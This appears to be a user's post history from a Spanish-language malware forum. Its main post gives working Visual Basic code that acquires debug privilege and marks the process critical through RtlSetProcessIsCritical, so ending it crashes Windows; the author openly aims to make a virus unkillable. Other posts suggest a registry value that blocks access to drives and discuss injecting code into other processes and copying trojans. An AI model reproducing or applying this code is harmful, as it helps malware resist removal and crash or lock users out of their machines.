Mensajes

Bueno este code hace uso de un API nativa de NTDLL.dll la cual setea nuestro proceso como un proceso critico del sistema al igual que winlogon o csrss, bueno el resultado de terminar nuestro proceso dara como resultado la BSOD (Blue Screen Of Death) de windows, espero les sea de utilidad, aplicandolo a nuestra especie viral haria que nuestro proceso no se pudiera terminar. casi interminable.

Codigo del Form:

Código (vb) [Seleccionar] Expandir


'*************************************************************************
'*************************************************************************
' Uso de RtlSetProcessIsCritical para setear nuestro proceso, como proceso
' critico del sistema: del mismo modo que csrss.exe o winlogon
' XcryptOR - Made In Colombia
'**************************************************************************
'*************************************************************************
Private Sub Form_Load()
On Error Resume Next
ObtenerPrivilegios SE_DEBUG_NAME ' obtiene privilegios de Debugeo
Call RtlSetProcessIsCritical(0, 0, 1) ' setea nuestro proceso como Proceso Critico
End Sub


Codigo Modulo:

Código (vb) [Seleccionar] Expandir


Option Explicit

Private Const ANYSIZE_ARRAY = 1
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2

Private Type LUID
    LowPart As Long
    HighPart As Long
End Type
Private Type LUID_AND_ATTRIBUTES
        pLuid As LUID
        Attributes As Long
End Type
Private Type TOKEN_PRIVILEGES
    PrivilegeCount As Long
    Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type


Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long



Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege"


Public Declare Function RtlSetProcessIsCritical Lib "ntdll.dll" (ByVal NewValue As Boolean, ByVal OldValue As Boolean, ByVal WinLogon As Boolean)

Public Function ObtenerPrivilegios(ByVal privilegio As String) As Long

Dim lpLUID As LUID
Dim lpToken As TOKEN_PRIVILEGES
Dim lpAntToken As TOKEN_PRIVILEGES
Dim hToken As Long
Dim hProcess As Long
Dim res As Long

hProcess = GetCurrentProcess()
res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
If res = 0 Then
    Exit Function
End If
res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID)
If res = 0 Then
    Exit Function
End If
With lpToken
    .PrivilegeCount = 1
    .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
    .Privileges(0).pLuid = lpLUID
End With

res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken))
If res = 0 Then
    Exit Function
End If
ObtenerPrivilegios = res
End Function


saludos

 Busca info sobre esta estructura FSCTL_LOCK_VOLUME creo que podrias hacer algo interesante hay bastantes ejemplos

Usa El registro de windows

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer escribe el valor NoViewOnDrive como REG_DWORD con el valor = 4

y lsito no tienes acceso al disco

Pues si estas corriendo como administrador no tendras problemas solo el usuario estandar requiere de permisos para instalar programas, me parece raro que no puedas instalarlo, te recomiendo te consigas otro cd de instalación

Saludos

Postea el code o mira la linea de codigo donde sale el error asi te podria ayudar mejor

saludos

Que Bien hermano, Te Ganaste el premio al mejor copy paster de la historia, ademas hasta la interfaz es de otro trojan solo le cambiaste los fondos y la mezcla de español e ingles demuestran todo: una funcion de aqui otra de alla. tienes merito por se tan insistente y decir que todito es tu autoria, pero bueno te diste la forma de que toda esa mezcla de codes te funcione eso si es trabajo, por ultimo te aconsejo que cuando publiques un code por lo menos lo modifiques bien.

saludos

si lo lei amigo, tengo un code similar en VB pero no me funciona, en delphi y C, hago la inyeccion sin problemas, yo quiero algo concreto para VB, no se si es la base address, ya que he escuchado que la inyeccion solo se puede hacer dentro otra aplicacion vb.

gracias

Spider te dije que no es inyección dll es inyección de code o exe dentro de otro exe, y eon gracias por el tuto la verdad esta muy bueno pero estenso.

saludos

pues la verdad en el foro yo NO he conseguido info al respecto, solo inyección dll, la cual es de lo mas sencilla. bueno ojala y pudieras enviar un link del foro donde encontrar la info que dices, gracias.

aunque he puesto control de errores en el code, al compilarlo y ejecutarlo hay algun error en memoria, si alguien puede ayudarme con el code